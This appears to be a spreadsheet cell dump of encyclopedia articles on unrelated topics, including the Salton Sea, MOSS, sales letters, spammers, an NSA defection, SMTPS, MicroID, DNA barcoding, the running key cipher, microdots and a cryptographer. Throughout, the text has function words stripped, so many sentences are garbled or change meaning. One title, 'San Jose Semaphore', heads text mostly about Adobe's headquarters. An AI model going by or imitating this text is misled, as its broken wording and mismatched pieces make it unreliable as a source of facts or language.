alamo based salton sea; sandy shores, town sits lake's southern edge, based town bombay beach. books blue labyrinth, douglas preston lincoln child, abandoned resort areas salton serve setting visited investigated special agent aloysius pendergast. legends legend lost pearl ship juan iturbe, spanish explorer abandons ship full gems lake cahuilla. also list drying lakes list lakes california references notes bibliography salton restoration project: opportunities challenges. salton project office (report). bureau reclamation. june 1999. archived original october 2004. retrieved february 2021. overview summary salton restoration project draft eis/eir. salton project office (report). u.s. bureau reclamation. january 2000. archived original 2019. salton restoration: final preferred project report (pdf) (report). salton authority. july 2004. archived original (pdf) october 2004. salton authority plan multi-purpose project (pdf) (report). salton authority. june 2006. restoration salton final report (report). u.s. bureau reclamation. december 2007. restoring salton (report). california legislative analyst's office. january 2008. overview management restoration activities salton (report). congressional research service. september 2013. water bond priorities: california's responsibility greatest opportunity revitalize dying ecosystem (pdf) (report). salton authority. october 2013. archived original (pdf) december 2016. salton funding feasibility action plan (pdf) (report). salton authority. 2016. salton sea: status update (report). california legislative analyst's office. august 2018. salton restoration (report). congressional research service. december 2020. further reading debuys, william myers, joan (199</t>
  </si>
  <si>
    <t>MIME Object Security Services</t>
  </si>
  <si>
    <t>mime object security services (moss) protocol uses multipart/signed multipart/encrypted framework apply digital signature encryption services mime objects. details services offered end-to-end cryptography originator recipient application layer. asymmetric (public key) cryptography used support digital signature service encryption management. symmetric (secret key) cryptography used support encryption service. procedures intended compatible wide range public management approaches, including certificate-based schemes. mechanisms provided support many public management approaches. spreading moss never widely deployed abandoned, largely popularity pgp. references external links 1848</t>
  </si>
  <si>
    <t>Sales letter</t>
  </si>
  <si>
    <t>sales letter piece direct mail designed persuade reader purchase particular product service absence salesman. defined form direct mail advertiser sends letter potential customer." distinct direct mail techniques, distribution leaflets catalogues, sales letter typically sells single product product line, tends mainly textual opposed graphics-based, although video sales letters become increasingly popular. typically used products services which, price, considered purchase medium high value (typically tens thousands dollars). sales letter often, exclusively, last stage sales process customer places order, designed ensure prospect committed becoming customer. since advent internet, sales letter become integral part internet marketing, typically takes form email webpage. unsolicited sales emails known spam, although spam typically consists emails much shorter normal sales letter. offline, unsolicited sales letters known junk mail. some relevant components sales letter split several sections. addition, sections used, sub-headlines. headline beginning sales letter considered important piece. email sales letters part called email subject, webpages takes format title headline, often followed additional text called sub-heading. body copy this section typically quite long, page letters common formats. this section typically contain testimonials firm's customers well pictures information product. internet, body copy include embedded video audio. conclusion sales letter intended customer commit purchasing product service, typically without intervention. sales letter special form advertising, aiming sell company’s goods services. sales letter must arouse interest, sound convincing, create desire encourage reader take action. write positive, convincing style aggressive. present advantages benefits reader. encourage response reader- phone call, visit, reply attached form etc. graphic design graphic design sales letter important part branding. font, layout, line spacing, paragraph formatting, images, etc. effect efficacy letter. development sales letters because direct response nature sales letters, carefully tested ongoing basis determine version performs best terms converting readers customers. sales letters typically developed incrementally, split testing various elements. this allows marketeer copywriter confirm headline, body text graphic design converts best. internet, possible track additional variables, open rate emails, bounce rate, clickthrough checkout, etc. references</t>
  </si>
  <si>
    <t>San Jose Semaphore</t>
  </si>
  <si>
    <t>adobe world headquarters corporate headquarters adobe systems, located jose, california. towers complex consists three towers: west, east almaden. 18-story, 78.9 (259 west tower, first built 1996, sixth tallest city jose, 391,000 (36,300 office space. 16-story, 71.9 (236 east tower 325,000 (30,200 office space, constructed next west tower 1998. 2003, 17-story (236 almaden tower completed adding 273,000 (25,400 m2). buildings situated atop 938,473-square-foot (87,187 enclosed parking garage. both west east towers house adobe's research development sales marketing departments, almaden tower houses administration staff. design buildings known green design. west tower listed energy star labeled building u.s. environmental protection agency. 2006, three towers awarded leadership energy environmental design (leed) platinum certification united states green building council environmental sustainability. jose semaphore adobe's almaden tower also notable "san jose semaphore," installation consisting four rotating lights created 2006 artist rubin. lights rotate every seconds according code; pattern deciphered 2007 mark snesrud mayo, discovered final message thomas pynchon's crying published whitepaper chronicling process decoding.as 2012, riddle displayed; code deciphered 2017 high school teacher jimmy waters tennessee. noticed particular sequence code might represent audio silence. running full sequence audio software changing pitch, heard neil armstrong's small step speech 1969 apollo moon landing. references</t>
  </si>
  <si>
    <t>List of spammers</t>
  </si>
  <si>
    <t>this list individuals organizations noteworthy engaging bulk electronic spamming, either behalf behalf others. list spammers, whose actions attracted substantial independent attention. nathan blecharczyk, founders airbnb, paid harvard providing spammers hosting services. shane atkinson, named interview zealand herald behind operation sending million emails 2003, claimed (and appeared) honor unsubscribe requests, claimed giving spamming shortly interview. brother lance ordered million u.s. authorities. serdar argic (a.k.a. zumabot), disrupted usenet posting messages different newsgroups attempt deny armenian genocide. canter siegel, husband wife famously posted first commercial usenet spam advertisements thousands newsgroups defiant face thousands email flames, supposedly generated $100,000 revenue richard colbert, retired spammer 2003) scoured business contacts, offering spam service, claims honored "unsubscribe" requests, gave interview york times. david d'amato, former assistant high school principal fined $5,000 spent year prison convicted 2001 online crimes including email bombs targeted individuals institutions. eddie davidson, convicted spammer died along wife daughter 2008 murder-suicide. peter francis-macrae, convicted fraudulent trading, blackmail, violent threats sending thousands businesses solicitations purchase internet domains own. davis wolfgang hawke, lost $12.8 million judgment 2004 using spam promote neo-nazi agenda. jumpstart technologies, incubator prominent social network first entity settlement great $900,000 violating can-spam act, later spun social networking site tagged, subsequently paid upwards $1.5 million various fines legal settlements involving government entities well private individuals, referred time magazine "the world's annoying website." vardan kushnir, famous russian spammer murdered 2005 reasons possibly unrelated spamming activities peter levashov, alleged russian operator kelihos botnet. extradited spain facing trial, currently connecticut jail. kevin lipsitz, “krazy kevin”, prolific spammer convicted york fraud charges 1997, stemming spamming usenet newsgroups advertisements using aol.com "reply-to:" address. resumed spamming 1999. oleg nikolaenko, arrested federal bureau investigation november 2010 "king spam." ryan pitylak, known “texas spam king”, admitted sending million emails every height spamming operation 2004. alan ralsky, scott bradley, john bown, william neil, james fite, pleaded guilty conspiring spam emails pump dump thinly traded stocks, violation can-spam act. group faced years prison time millions dollars penalties terms plea agreements. dave rhodes, (possibly apocryphal) name attached famous chain letter titled "make money fast" originated late 1980s. scott richter, paid million microsoft 2006 settlement arising lawsuit alleging illegal spam activities. russian business network christopher "rizler" smith, forced $5.5 million america online spam activity 2003 currently serving 30-year prison sentence charges related spam. jody michael smith, spammer director world's largest online replica watch network. shut october 2008. smith served months federal prison forfeited $800,000 assets. robert alan soloway, lost million civil judgment microsoft forced million small oklahoma. soloway eventually caught sentenced months prison. gary thuerk, "father spam" sent first unsolicited email blast arpanet members, 1978. khan smith, first major prolific spammer technology developer sued major landmark case resulting million fine collapse largest spam network history. court documents show illegal network delivered email sent world 2001. sanford wallace, fined million can-spam 2006, lost $230 million judgment myspace 2008, ordered $711 million damages facebook 2009 accessing users' accounts without permission sending phony posts messages. adam guerbuez, fined $873 million u.s. district court northern district california case brought facebook. also anti-spam techniques list computer criminals newsgroup spam references external links media related spammers wikimedia commons</t>
  </si>
  <si>
    <t>Martin and Mitchell defection</t>
  </si>
  <si>
    <t>september 1960, u.s. national security agency (nsa) cryptologists, william hamilton martin bernon mitchell, defected soviet union. secret 1963 study said that: "beyond doubt, event had, likely future, greater impact agency's security program."martin mitchell serving u.s. navy japan early 1950s joined 1957. they defected together soviet union 1960 and, moscow press conference, revealed denounced various u.s. policies, especially provocative incursions space nations spying america's allies. underscoring apprehension nuclear war, said: would attempt crawl moon thought would lessen threat atomic war."within days press conference, citing trusted source, congressman francis walter, chairman house un-american activities committee (huac), said martin mitchell "sex deviates", prompting sensational press coverage. u.s. officials national security council privately shared assumption part traitorous homosexual network. classified investigations, hand, determined pair "greatly inflated opinions concerning intellectual attainments talents" defected satisfy social aspirations. house un-american activities committee publicly intimated interpretation relationship martin mitchell homosexual reading guided pentagon's discussion defection decades. early lives careers william hamilton martin (may 1931 january 1987) born columbus, georgia. family soon moved washington state father president ellensburg chamber commerce. graduated ellensburg high school years. after studies central washington college education (now central washington university), earned degree mathematics university washington seattle 1947. enlisted united states navy served 1951 1954, working cryptologist naval security group japan. hobbies, martin played chess collected japanese sword handles (tsuka).bernon mitchell (march 1929 november 2001) born raised eureka, california, enlisted navy year college. gained experience cryptologist tour duty navy 1951 1954, serving japan naval security group kami seya. stayed japan another year, working army security agency. following navy service, 1957 earned bachelor's degree statistics stanford university.martin mitchell became friends navy service naval communications intercept facility kami seya, japan. they kept touch returned school navy service encountered another recruited national security agency (nsa) 1957. their years uneventful. martin gained enough recognition twice awarded scholarships study toward master's degree. background defection mitchell martin became disturbed learned american incursions foreign airspace realized congress unaware nsa-sponsored flights. february 1959, violation rules, tried report knew congressman expressed frustration information receiving nsa, ohio democrat wayne hays. december 1959, pair visited cuba, without notifying superiors required procedures. defection june 1960, mitchell martin left u.s. mexico. they traveled havana sailed russian freighter soviet union. august pentagon announced returned vacation said: "there likelihood gone behind iron curtain." september 1960, appeared joint news conference house journalists moscow announced requested asylum soviet citizenship. during conference, defectors made public first time mission activities prepared statement written, said: "without consulting government soviet union". said that: "the united states government unscrupulous accused soviet government being". they also said: main dissatisfaction concerned practices united states uses gathering intelligence information deliberately violating airspace nations intercepting deciphering secret communications allies perhaps united states hostility towards communism arises feeling insecurity engendered communist achievements science, culture industry. know previous experience working n.s.a., united states successfully reads secure communications forty nations, including allies. they particularly attacked views general thomas power recently told congressional committee u.s. needed maintain nuclear first-strike capability senator barry goldwater's opposition banning nuclear tests negotiating disarmament treaty. contrast, said: would attempt crawl moon thought would lessen threat atomic war." u.s. recently admitted sending reconnaissance flights foreign countries recent years, martin mitchell said knew navy service flights occurred early 1952–1954. they detailed u.s. c-130 flight soviet armenia soviets brought down. they contended designed gain understanding soviet defenses, therefore represented american interest attacking soviets rather defending them. they also complained restrictions freedom u.s., government confiscation mail, particularly freedom "not theists" "whose political convictions unpopular". interview soviet news agency tass december 1960, expressed belief american espionage russia, u.s. allies, neutral nations would continue unchanged despite inauguration american president january 1961.in response, american government called mitchell martin's charges "completely false". department defense called "turncoats" "tools soviet propaganda", "one mentally sick obviously confused". also characterized positions "junior mathematicians". initial allegations homosexuality york times described "long-time bachelor friends" reported smiled described social advantages anticipated soviet union, where, prepared statement said: "the talents women encouraged utilized much greater extent soviet union united states. feel enriches soviet society makes soviet women desirable mates."the issue pair's sexuality raised dismissed government: "representative francis walter, democrat pennsylvania [and chairman house un-american activities committee], denied made allegation, reported news agency, described homosexual report federal bureau investigation." pentagon spokesman told reporters nothing mitchell martin's personnel records suggest homosexuality sexual perversion. next day, congressman walter explicitly stated source trusted told defectors "known acquaintances 'sex deviates'". that charge promptly picked press resulted immediately stories homosexuals recruiting "other sexual deviates" jobs federal government. hearst newspapers referred martin mitchell "two defecting blackmailed homosexual specialists" "love team". time reported review security checks turned mitchell visit psychiatrist "presumably concern homosexual tendencies". later years according later government report, martin—who fluent russian—studied leningrad university (now saint petersburg state university), used name vladimir sokolodsky. married soviet citizen divorced 1963. later told russian newspaper defection "foolhardy". also expressed disappointment russians trust important work. occasionally sought help american visitors arranging repatriation, including donald duffy, vice president kaiser foundation, bandleader benny goodman. another occasion told american defecting believed vision russia presented propaganda publications like ussr soviet life. 1975, source told u.s. government martin "totally skids." 1979, inquired american consulate repatriation. result, case examined stripped american citizenship. next denied permission immigrate u.s. denied tourist visa. martin eventually left soviet union died cancer mexico january 1987, tijuana's hospital mar. buried u.s.less known mitchell. having renounced u.s. citizenship, remained soviet union. married galina vladimirovna yakovleva, member piano department faculty leningrad conservatory. became alcoholic regretted decision. mitchell died heart attack november 2001, buried petersburg. government response defections another life inside u.s. intelligence community. meeting national security council october 1960, officials considered response martin-mitchell affair. attorney general william rogers believed soviets list homosexuals recruiting blackmail efforts, martin mitchell part organized group". several meeting thought polygraph tests would help prevent hiring homosexuals. president eisenhower wanted central authority coordinate government lists homosexuals.in order prevent another occurrence, needed understand motivated defectors. their initial investigation turned little interest. notes psychological counseling sessions 1940s described martin "brilliant emotionally immature" offered diagnosis "beginning character neurosis schizoid tendencies" mentioned likely "sadistic". mitchell told questioned long starting work agency experimented sexually teenager dogs chickens. immediate response focused sexual issues. july 1961 agency announced purged employees identified "sexual deviates" though added qualification "not homosexuals".yet series investigations gave little credit role sexuality mitchell martin's defection. 1961, report called "close friends somewhat anti-social", "egotistical, arrogant insecure young whose place society much lower believed deserved", "greatly inflated opinions concerning intellectual attainments talents". 1963, another report found clear motive", recruited foreigners, termed defection "impulsive". files obtained journalists seattle weekly 2007 cited definitive testimony part women acquaintances attested heterosexuality. perversions recorded martin's "all-controlling sadomasochism". occasionally watched women multiple female partners.in 1962, congressman walters' house un-american activities committee (huac) concluded 13-month investigation issued report defections. where mitchell told psychiatrist affairs women troubled sexual identity, report referred "homosexual problems". report never identified rationale mitchell martin defections, focused inadequacy investigations granted security clearances despite evidence "homosexuality sexual abnormality", atheism, communist sympathies part men. report made series recommendations respect hiring practices security investigations promptly adopted agency.later government analyses went beyond characterizations huac account, unaware nsa's unpublished analysis. despite contrary evidence, 1991 study pentagon's defense security service—still 2007—called martin mitchell "publicly known homosexuals". also project homerun lavender scare perry fellwock notes references additional sources barrett, david (2009). "secrecy, security, sex: nsa, congress, martin–mitchell defections". international journal intelligence counterintelligence. (4): 699–729. doi:10.1080/08850600903143320. obituary, eureka times-standard, november 2001</t>
  </si>
  <si>
    <t>SMTPS</t>
  </si>
  <si>
    <t>smtps (simple mail transfer protocol secure) method securing smtp using transport layer security. intended provide authentication communication partners, well data integrity confidentiality. smtps proprietary protocol extension smtp. secure smtp transport layer, wrapping smtp inside tls. conceptually, similar https wraps http inside tls. this means client server speak normal smtp application layer, connection secured tls. this happens connection established, mail data exchanged. since whether explicitly negotiated peers, services speak smtps usually reachable dedicated port own. difference smtps smtps "smtps" also name iana-registered service, port number 465. service intended mail transfer agents (mtas), point contact could exchange email encrypted form rather plaintext. registration quickly revoked, however, standardization efforts resulted alternate approach. registration never reinstated. when describing iana service registration, official capitalization "smtps". when describing network protocol, capitalization "smtps" often used (similar https capitalized). port well-known port submitting mail server, frequently (but required encrypted using starttls. some email service providers allow customers smtps protocol access tls-encrypted version "submission" service port 465. this different service original iana registration dedicated port (for used dedicated encrypted content delivered as-is plain text, whereas nowadays' smtps port still uses plaintext content, wrapped within tls-encrypted transportation-basically reverse mechanism). 8314 aims rectify problem integrate port tls-encrypted "submission" port well-known port registrations published iana. proposed service name "submissions". while longer officially registered endpoint smtp service, still possible exchange email encrypted transport similar guarantees offered smtps, particular guarantee either exchange succeeds securely, happen all, using dane combination dnssec. many email servers configured either deliver email securely all, first secure delivery starttls mechanism, fails, example, remote service offer successful mitm-attack stripped announcement feature, simply fall back delivery insecure means. history early 1997, internet assigned numbers authority registered port smtps. late 1998 revoked starttls standardized. with starttls, port used without tls. well-known ports mail exchanges communicating smtp discussed particular time. port currently shows registered source-specific multicast submissions. 8314 "cleartext considered obsolete: email submission access" proposes officially recognize port implicitly encrypted email submission. also email client port numbers references</t>
  </si>
  <si>
    <t>MicroID</t>
  </si>
  <si>
    <t>microid decentralized identity protocol. originally developed 2005 jeremie miller [1]. microid simple identifier comprising hashed communication/identity (e.g. email, openid, and/or yadis) claimed url. together, elements create hash claimed third-party services. laurie demonstrated privacy problems 2006 chris erway brown technical report 2008 microid exchange here example microid hash, pseudocode: microid sha1( sha1("mailto:user@example.com") sha1("http://example.net/") computed microid would placed page claimed. verifier, would independently generate microid, would visit page generated microid microid page. same, claim exists. microid based communication uri. since microid provider verifier verify communication uri, proper microid implementation allows trusted identity claims. security limitations microid essentially content signed email address attribution. since content known comparison purposes, microid claim forged anybody knows communication (e.g. email address) associated identity. particular, since verifier must generate microid order compare follows party trusted verify user's microid must also trusted generate authorship claims verify forge. words anyone (e.g. alice) verify someone (e.g. bob) microid resource also generate (spoof) microid document (e.g. alice generate valid microid document equal bob's name). assuming identity known (e.g. publisher chosen remain anonymous denies others ability verify microid claim time future reveals identity) someone email addresses perform trivial dictionary attack find ownership resources, someone perform trivial dictionary attack find email address.[3] (only) remaining usecase entity generates strong cryptographic nonce (e.g. uuid); uses publish documents time—and time future reveals uuid prove wrote documents (and accepts point forward anyone make claims behalf). privacy limitations explained above, microid hash made public semi public email. those know verify identity claim page. hashing helps hide semi public email address people know particular spammers. however, research popular social websites last.fm, digg claimid show brute-force attack decrypt email address 20–25% cases. brute force attack guesses email addresses derived public user name information available social websites, thus checks dozen candidate addresses microid. despite this, study showed simple attack like could still successful quarter time spending fraction second check candidates user. hashing scheme thus guarantee privacy email address. architecture microid claim example successful microid claim follows: user signs service. that service verifies user's email, creates public pages user contain microid. that microid comprises hashed email (communication uri) webpage. user signs verifier service. service also verifies user's email. user inputs page wishes claim verifier service. verifier service computes microid attempts verify microid claimed page. microid claimed page verifier service, claim exists. verifier claim ownership page. microid microid allows claiming semantic html elements. example, microid inserted block-level element constitute ownership claim anything element. microid inserted header page constitute ownership claim page. claims verifiable granularity uris. known microid providers following services provide microids users: claimid filmweb identi.ca ma.gnolia chi.mp known microid verifiers following services verify microid claims: claimid wink external links http://microid.org microid homepage http://microid.org/blog microid blog http://lists.ibiblio.org/mailman/listinfo/microid microid mailing list http://microid.org/code/ microid open source code references</t>
  </si>
  <si>
    <t>Microbial DNA barcoding</t>
  </si>
  <si>
    <t>microbial barcoding metabarcoding characterize mixture microorganisms. metabarcoding method barcoding uses universal genetic markers identify mixture organisms. history using metabarcoding assess microbial communities long history. back 1972, carl woese, mitchell sogin stephen sogin first tried detect several families within bacteria using rrna gene. only years later, tree life three domains proposed woese colleagues, first small subunit ribosomal (ssu rrna) gene distinguish bacteria, archaea eukaryotes. approach, rrna gene made frequently used genetic marker prokaryotes (16s rrna) eukaryotes (18s rrna). tedious process cloning fragments sequencing fastened steady improvement sequencing technologies. with development (high-throughput-sequencing) early 2000s ability deal massive data using modern bioinformatics cluster algorithms, investigating microbial life much easier. genetic markers genetic diversity varying species species. therefore, possible identify distinct species recovery short sequence standard part genome. this short sequence defined barcode sequence. requirements specific part genome serve barcode high variation different species, much differences gene individuals species make differentiating individual species easier. bacteria archaea rrna/rdna gene used. common housekeeping gene prokaryotic organisms therefore used standard barcode assess prokaryotic diversity. protists, corresponding rrna/rdna gene used. distinguish different species fungi, (internal transcribed spacer) region ribosomal cistron used. advantages existing diversity microbial world unraveled completely yet, although know mainly composed bacteria, fungi unicellular eukaryotes. taxonomic identification microbial eukaryotes requires exceedingly skillful expertise often difficult small sizes organisms, fragmented individuals, hidden diversity cryptic species. further, prokaryotes simply taxonomically assigned using traditional methods like microscopy, small morphologically indistinguishable. therefore, metabarcoding, possible identify organisms without taxonomic expertise matching short high throughput sequences (hts)-derived gene fragments reference sequence database, e.g. ncbi. these mentioned qualities make barcoding cost-effective, reliable less time-consuming method, compared traditional ones, meet increasing need large-scale environmental assessments. applications studies followed first usage woese al., covering variety applications. biological ecological research metabarcoding used. also medicine human biology bacterial barcodes used, e.g. investigate microbiome bacterial colonization human normal obese twins comparison studies newborn, child adult bacteria composition. additionally, barcoding plays major role biomonitoring e.g. rivers streams grassland restoration. conservation parasitology, environmental parasitology paleoparasitology rely barcoding useful tool disease investigating management, too. cyanobacteria cyanobacteria group photosynthetic prokaryotes. similar prokaryotes, taxonomy cyanobacteria using sequences mostly based similarity within ribosomal gene. thus, common barcode used identification cyanobacteria rdna marker. while difficult define species within prokaryotic organisms, marker used determining individual operational taxonomic units (otus). cases, otus also linked traditionally defined species therefore considered reliable representation evolutionary relationships. however, analyzing taxonomic structure biodiversity whole cyanobacterial community (see metabarcoding), informative markers specific cyanobacteria. universal bacterial primers used successfully isolate cyanobacterial rdna environmental samples, also recover many bacterial sequences. cyanobacteria-specific phyto-specific markers commonly used focusing cyanobacteria only. sets primers tested barcoding metabarcoding environmental samples gave good results, screening majority non-photosynthetic non-cyanobacterial organisms.number sequenced cyanobacterial genomes available databases increasing. besides marker, phylogenetic studies could therefore include also variable sequences, sequences protein-coding genes (gyrb, rpoc, rpod, rbcl, hetr, psba, rnpb, nifh, nifd), internal transcribed spacer ribosomal genes (16s-23s rrna-its) phycocyanin intergenic spacer (pc-igs). however, nifd nifh used identification nitrogen-fixing cyanobacterial strains. barcoding cyanobacteria applied various ecological, evolutionary taxonomical studies. some examples include assessment cyanobacterial diversity community structure, identification harmful cyanobacteria ecologically economically important waterbodies assessment cyanobacterial symbionts marine invertebrates. potential serve part routine monitoring programs occurrence cyanobacteria, well early detection potentially toxic species waterbodies. this might help detect harmful species start form blooms thus improve water management strategies. species identification based environmental could particularly useful cyanobacteria, traditional identification using microscopy challenging. their morphological characteristics basis species delimitation vary different growth conditions. identification microscope also time-consuming therefore relatively costly. molecular methods detect much lower concentration cyanobacterial cells sample traditional identification methods. reference databases reference database collection sequences, assigned either species function. used link molecular obtained sequences organism pre-existing taxonomy. general databases like ncbi platform include kind sequences, either whole genomes specific marker genes organisms. there also different platforms sequences distinct group organisms stored, e.g. unite database exclusively fungi sequences database solely protist ribosomal sequences. some databases curated, allows taxonomic assignment higher accuracy using uncurated databases reference. also consortium barcode life algae barcoding barcoding barcoding diet assessment fish barcoding references</t>
  </si>
  <si>
    <t>Running key cipher</t>
  </si>
  <si>
    <t>classical cryptography, running cipher type polyalphabetic substitution cipher text, typically book, used provide long keystream. usually, book used would agreed ahead time, passage used would chosen randomly message secretly indicated somewhere message. example text used programming language (1978 edition), tabula recta tableau. plaintext "flee once". page line selected running key: errors occur several places. label has... running written plaintext: message sent "jcvsr lqnps". however, unlike vigenère cipher, message extended, repeated; text used key. message extended, "flee once. discovered", running continues before: determine find running key, fake block five ciphertext characters subsequently added, three denoting page number, line number, using a=0, etc. encode digits. such block called indicator block. indicator block inserted second last message. (many schemes possible hiding indicator blocks.) thus page line encodes "agdab" (06301). this yields final message "jcvsr lqnps yguim qawxs agdab mecto". variants modern variants running cipher often replace traditional tabula recta bitwise exclusive operate whole bytes rather alphabetic letters, derive running keys large files. apart possibly greater entropy density files, ease automation, little practical difference variants traditional methods. permutation generated running keys compact running used combinatorially generates text using several start pointers combination rules). example, rather start place single pointer), could several start pointers together streams form running key, similarly skip rules used. what exchanged series pointers running book and/or series rules generating permuted running initial text. (these exchanged public encryption person. they also changed frequently without changing running book.) ciphertext appearing plaintext traditional ciphertext appears quite different plaintext. address problem, variant outputs "plaintext" words instead "plaintext" letters ciphertext output. this done creating "alphabet" words practice multiple words correspond ciphertext output character). result ciphertext output looks like long sequence plaintext words (the process nested). theoretically, different using standard ciphertext characters output. however, plaintext-looking ciphertext result "human loop" mistakenly interpret decoded plaintext. example would (berkhoff deflater algorithm), ciphertext output character least noun, verb, adjective adverb associated (e.g. least) every ascii character). grammatically plausible sentences generated ciphertext output. decryption requires mapping words back ascii, decrypting characters real plaintext using running key. nested-bda output reencryption process several times, producing several layers "plaintext-looking" ciphertext potentially requiring "human-in-the-loop" interpret non-existent semantic meaning. gromark cipher "gromark cipher" ("gronsfeld cipher mixed alphabet running key") uses running numerical formed adding successive pairs digits. cipher uses similar lagged fibonacci generator. security running truly random, never reused, kept secret, result one-time pad, method provides perfect secrecy (reveals information plaintext). however, usual) running block text natural language, security actually becomes fairly poor, since text non-random characteristics used cryptanalysis. result, entropy character plaintext running low, combining operation easily inverted. attack cipher, cryptanalyst runs guessed probable plaintexts along ciphertext, subtracting possible position. when result chunk something intelligible, high probability guessed plain text correct position either actual plaintext, part running key). 'chunk something intelligible' often extended either end, thus providing even probable plaintext turn extended, eventually likely source running identified, there several ways improve security. first obvious secret mixed alphabet tableau instead tabula recta. this indeed greatly complicate matters complete solution. pairs plaintext running characters likely high frequency pairs 'ee' rather than, say, 'qq'. skew causes output frequency distribution smeared fact quite possible 'ee' 'qq' ciphertext character, nevertheless distribution flat. this enable cryptanalyst deduce part tableau, proceed (but gaps sections missing reconstructed tableau). another possibility text entropy character typical english. purpose, advised agents documents like almanacs trade reports, often contain long lists random-looking numbers. another problem keyspace surprisingly small. suppose million texts might plausibly used, average thousand possible starting positions. opponent massive collection possible texts, leaves possible brute force search order {\displaystyle 2^{40}} computer cryptography standards relatively easy target. (see permutation generated running keys approach problem). confusion because ciphers classically employed novels part material, many sources confuse book cipher running cipher. they really distantly related. running cipher polyalphabetic substitution, book cipher homophonic substitution. perhaps distinction clearly made fact running cipher would work best book random numbers, whereas book (containing text) would useless book cipher. also polyalphabetic substitution substitution cipher book cipher topics cryptography references</t>
  </si>
  <si>
    <t>Microdot</t>
  </si>
  <si>
    <t>microdot text image substantially reduced size prevent detection unintended recipients. microdots normally circular around millimetre diameter made different shapes sizes made various materials polyester metal. name comes fact microdots often size shape typographical dot, period tittle lowercase microdots are, fundamentally, steganographic approach message protection. history 1870 franco-prussian war, paris siege messages sent carrier pigeon. parisian photographer rené dagron used photographic shrinking technique permit pigeon carry high volume messages, pigeons carry little weight.improvement technology since made even miniaturization possible. international congress photography paris 1925 emanuel goldberg presented method producing extreme reduction microdots using two-stage process. first, initial reduced negative made, image negative projected eyepiece modified microscope onto collodium emulsion microscope specimen slide would reduction page text would legibly reproduced surface 0.01 mm2. this density comparable entire text bible fifty times square inch. goldberg's "mikrat" (microdot) prominently reported time english, french german publications.a technique comparable modern microdots steganographic purposes first used germany world world also later used many countries pass messages insecure postal channels. later microdot techniques used film aniline dye, rather silver halide layers, even harder counter-espionage agents find. popular article espionage edgar hoover reader's digest 1946 attributed invention microdots "the famous professor zapp technical university dresden". however, never professor zapp university microdot historian william white denounced hoover's article "concoction semitruths overt disinformation". nevertheless, article reprinted, translated, widely uncritically cited literature espionage. hoover's zapp wrongly identified walter zapp, inventor minox camera, used spies make microdots. hoover appears conflated emanuel goldberg, professor dresden, kurt zapp who, late second world war, dresden taught spies make microdots. world microdot production sometimes called zapp outfit. germany berlin wall erected, special cameras used generate microdots attached letters sent regular mail. these microdots often went unnoticed inspectors, information could read intended recipient using microscope. modern usage microdot identification microdot identification process tiny identification tags etched coded given number, vehicles, vehicle vin, asset identification number unique serial number. unique personal identification numbers (pin), asset identification number customized customer data entries also available. microdots brushed sprayed onto parts asset provide complete parts marking. technology developed united states 1990s commercialized various manufacturers distributors around world. south africa legal requirement microdot fitted vehicles sold since september 2012 vehicles require police clearance.most printers print addition documents requested pages tiny yellow dots containing printer serial number time stamp. these microdots, arrays difficult-to-see dots across printed page encoded pattern. popular culture 2006 motion picture mission: impossible microdot hidden back postage stamp contained magnetically stored video file. superman #655 (vol. sep. 2006), clark kent uses various microdots implanted throughout suspense novel read novel also numerous works various topics. microdots used explore superman's newly enhanced mental capabilities. 1967 movie only live twice, tiger tells james bond found microdot captured spectre photograph, enlarges bond. 1966 movie arabesque microdot hidden goose parchment hieroglyphs. philip dick's characters scanner darkly tells drug-induced story wherein worker local microdot factory tracked company's entire inventory parking sole shoe. nancy drew game, phantom venice, clue hidden using microdot exclamation point. 2003 film paycheck uses realistic rendering microdot plot element. handling microdot technology film worth noting viewer shown well microdot made blend complementary environment well much information carry. white collar episode were" microdot used send covert message special agent clinton jones. covert affairs episode "sad professor" microdot used characters store intelligence related operation language professor used previously worked cia. venture bros. episode "powerless face death"; prison, character tiny joseph comments "they usually write microdots hand." c.i.d. episodes 202, "case multiple puzzles", microdot sold intelligence bureau officer terrorists. microdot information missile technology india. harvey oswald famously wrote "micro dots" address book underneath address printing company worked 1962 1963. 1965 television series smart (season episode "dear diary" original air-date 1966) agent agent shown first "microdot" city museum. comedic value microdot size small plate. 1968 television series takes thief (season episode spot trouble"), agent mundy called sensitive plans weapon stolen later learned converted microdot. blake mortimer s.o.s. meteors comic book, foreign organization responsible altering weather patterns europe uses microdots embedded letter envelopes relay projected weather data clandestine stations. microdot however misattributed "famous german inventor" zapp. television series avengers, 1961 episode "one mortuary" microdots transport major plot theme. margaret atwood's 2019 novel testaments, sequel handmaid's tale, microdots used communication high official republic gilead mayday resistance members canada. microdots smuggled back forth print brochures also inserted tattoo defector gilead canada. blacklist, episode season “cornelius ruck (no. 155),” operative uses microdot covertly send list operatives back references external links microdot photography microdot technology anti theft microdot technology india</t>
  </si>
  <si>
    <t>Rudolf Bailovic</t>
  </si>
  <si>
    <t>rudolf bailovic (born 1885 sarajevo) serbo-croatian interpreter cryptographer, austrian descent, head balkan referat general nachrichtenaufklärung world bailovic held civil service rank civil servant (german: regierungsrat) promoted senior civil servant oberregierungsrat 1944. bailovic considered anti-nazi, held anti-nazi views, refused wear german decorations, uniform. bailovic also turkish interpreter spent significant time evaluation, providing intelligence. military career bailovic colonel austro-hungarian army, served officer trieste director austrian cipher bureau world considered middle ranking official austrian cipher section, fenner, world during anschluss, bailovic refused surrender keys department nazis austria subsumed. subsequently, relegated minor position austrian civil service. general erich fellgiebel fritz thiele, recognising potential, ordered wilhelm fenner vienna, bring bailovic, along seven colleagues back germany, employed cryptanalysts evaluators. final tally, people came back bailovic, included joseph seifert, current director austrian cipher bureau. upon landing germany, forschungsamt official party airport forschungsamt (abbr. official offered money bailovic work them, fenner found disturbing. bailovic initially worked luftwaffe's chief hermann göring private cipher bureau, specifically nazi party. bailovic worked unit several months, left unexpectedly known employed inspectorate 7/vi autumn 1941, balkan desk. during period, results solving codes cyphers balkan section generally forwarded kona signals unit assigned balkans theatre.for much working life inspectorate 7/vi, bailovic informal bailovic party, anti-nazi clique. after july plot, nazi, grupperleiter major lechner appointed replace major mettig commander 7/vi. bailovic party held able personnel highly regarded, dwindling balkan traffic meant unit became superfluous, lost prestige power. with nazi leader major lechner, group disbanded. bailovic removed unit, along several others, lechner posted west become commander kona 6.in october 1944, bailovic appointed okw/chi position head desk dealing specifically balkan traffic. towards war, became administrator, balkans invaded balkan message traffic dwindled became progressively rarer, reached conclusion. references</t>
  </si>
  <si>
    <t>Microprinting</t>
  </si>
  <si>
